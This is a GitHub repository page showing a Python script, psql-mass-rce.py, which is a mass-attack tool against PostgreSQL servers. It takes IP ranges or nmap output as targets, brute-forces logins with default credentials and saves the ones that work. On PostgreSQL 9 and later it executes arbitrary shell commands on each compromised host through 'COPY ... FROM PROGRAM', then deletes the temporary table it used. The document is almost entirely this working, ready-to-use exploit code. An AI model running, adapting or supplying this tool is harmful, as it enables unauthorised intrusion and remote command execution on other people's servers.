forked from attackercan/psql-mass-rce
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpsql-mass-rce.py
executable file
·257 lines (198 loc) · 8.74 KB
/
psql-mass-rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
#!/usr/bin/env python3
import argparse
import psycopg2
import re
from netaddr import *
import uuid
class Victim:
def __init__(self, ip, port, username=None, password=None):
self.ip = ip
self.port = port
self.username = username
self.password = password
def try_login(self, username='', password=''):
return self.make_query(username, password)
def port_is_open(self):
data = self.try_login()
if data['message'] == 'timeout':
print(self.ip, '- Timeout')
return False
else:
return True
# Bruteforce login/password lists
# Sets self.username, self.password if valid
# Returns True or False
def bruteforce(self, userlist, passlist):
for username in userlist:
for password in passlist:
data = self.try_login(username, password)
if data['status'] == 'ok':
print("[+] Good credentials:", username + ":" + password)
self.username = username
self.password = password
self.add_version(data['message'])
return True
return False
def add_version(self, version):
self.version = version
self.major_version = int(re.findall(r'PostgreSQL (.*?)\.', version, re.IGNORECASE)[0])
self.is_linux = any(x in version for x in ['linux', 'x86_64', 'Debian', 'Ubuntu'])
def do_rce(self, command):
if not command:
if self.is_linux:
command = 'uname -a && id && ifconfig'
else:
command = 'ipconfig && whoami /priv'
if self.major_version >= 9:
rce = self.do_rce_v9_v10(command)
elif self.major_version == 8:
rce = self.do_rce_v8(command)
else:
print("[-] PSQL version is too old")
print("[!] RCE '" + command + "'")
print(rce + "\n" + "-" * 50)
def do_rce_v9_v10(self, command):
random_string = "backup_" + uuid.uuid4().hex[:10] # Table name cannot begin with a number
self.make_query(self.username, self.password, "CREATE TABLE IF NOT EXISTS " + random_string + " (id text);")
self.make_query(self.username, self.password, "COPY " + random_string + " from program '" + command + "';")
command_result = self.make_query(self.username, self.password, "SELECT id FROM " + random_string + ";")
self.make_query(self.username, self.password, "DROP TABLE " + random_string + ";")
return command_result['message']
def do_rce_v8(self, command):
return 'RCE v8 is not implemented yet'
# Make PSQL query with psycopg2
# Returns {'status': '', 'message': ''}
def make_query(self, username, password, query='SELECT version();'):
_result = None
try:
try:
conn = psycopg2.connect(host=self.ip, port=self.port, user=username, password=password,
connect_timeout=2, dbname='')
except psycopg2.OperationalError as e:
if "timeout expired" in str(e):
return {'status': 'fail', 'message': 'timeout'}
return {'status': 'fail', 'message': str(e)}
# In case you face encoding issues, try changing default encoding to one that suits your needs.
# Encoding list reference: https://www.postgresql.org/docs/current/multibyte.html#CHARSET-TABLE
# Uncomment the following string:
# conn.set_client_encoding('WIN1251')
cur = conn.cursor()
cur.execute(query)
if "select" in query.lower():
list_results = []
for row in cur.fetchall():
list_results.append(row[0])
_result = "\n".join(list_results)
else:
conn.commit()
cur.close()
conn.close()
return {'status': 'ok', 'message': _result}
except psycopg2.Error as e:
cur.close()
conn.close()
# print("[-] Could not '" + query + "' :", e)
return {'status': 'fail', 'message': str(e)}
class Session:
good_targets = ['']
filename = ''
@staticmethod
def load_session_file(filename):
Session.filename = filename
try:
with open(filename) as f:
lines = f.read().splitlines()
Session.good_targets = lines
except:
pass
@staticmethod
def save_victim(victim):
host_port = victim.ip + ":" + str(victim.port)
for line in Session.good_targets:
if host_port in line:
return
f = open(Session.filename, 'a+')
f.write(host_port + ":" + victim.username + ":" + victim.password + "\n")
f.close()
Session.good_targets.append(host_port)
class InputData:
def __init__(self):
self.args = self.parse_cli_args()
self.__data_for_attack = []
self.compose_data_for_attack()
def get_data_for_attack(self):
return self.__data_for_attack
@staticmethod
def parse_cli_args():
parser = argparse.ArgumentParser(description='Scan network for postgreses, bruteforce passwords, pwn.')
parser.add_argument('targets', metavar='targets', type=str, nargs='*',
help='Accepts any number of these: IP, subnet, or .gnmap file') # nargs='+' if targets is necessary
parser.add_argument('-iL', dest='targets_file',
default=None, help='Load IP[:port] targets from local file')
parser.add_argument('--userfile', dest='userfile',
default=['postgres'], help='File with a list of users')
parser.add_argument('--passfile', dest='passfile',
default=['postgres', 'postgres1'], help='File with a list of passwords')
parser.add_argument('--command', dest='command',
default='', help='Command to execute on a target machine')
parser.add_argument('--port', dest='port',
default=5432, help='Port to connect')
parser.add_argument('--saved', dest='saved', action='store_true',
default=False, help='Work on targets from saved session file')
return parser.parse_args()
# Parse gnmap file
# Returns (ip, port)
def parse_file_gnmap(self, file_path):
try:
with open(file_path, 'r') as w:
data = w.read()
parsed = re.findall(r'Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}) .* ([0-9]{1,5})/', data)
return parsed
except FileNotFoundError:
return ()
# Parse string from CLI arguments: ip/range/file.
# Returns [(ip, port)]
def parse_target(self, target, port):
try:
return map(lambda arg: (str(arg), port), list(IPGlob(target))) # IP/range to [(host,port)]
except:
pass
try:
return map(lambda arg: (str(arg), port), list(IPNetwork(target))) # IP/range to [(host,port)]
except:
pass
try:
return self.parse_file_gnmap(target) # local gnmap file
except:
print("Target is not IP or a Network. Try to re-set latest(s) bit, e.g. 8.8.0.0/16")
exit()
def compose_data_for_attack(self):
if self.args.saved: # --saved
for line in Session.good_targets:
data = line.strip().split(':')
self.__data_for_attack.append([data[0], data[1], [data[2]], [data[3]]])
elif self.args.targets_file: # -iL
for line in open(self.args.targets_file):
data = line.strip().split(':')
try:
_port = data[1]
except:
_port = self.args.port
for ip, port in self.parse_target(data[0], _port):
self.__data_for_attack.append([ip, port, self.args.userfile, self.args.passfile])
else: # CLI arguments
for target in self.args.targets:
for ip, port in self.parse_target(target, self.args.port):
self.__data_for_attack.append([ip, port, self.args.userfile, self.args.passfile])
def main():
Session.load_session_file('.psql-mass-rce.saved')
input = InputData()
for ip, port, userlist, passlist in input.get_data_for_attack():
print("[x] Starting host " + ip + ":" + str(port))
victim = Victim(ip, port)
if victim.port_is_open():
if victim.bruteforce(userlist, passlist):
Session.save_victim(victim)
victim.do_rce(input.args.command)
if __name__ == '__main__':
main()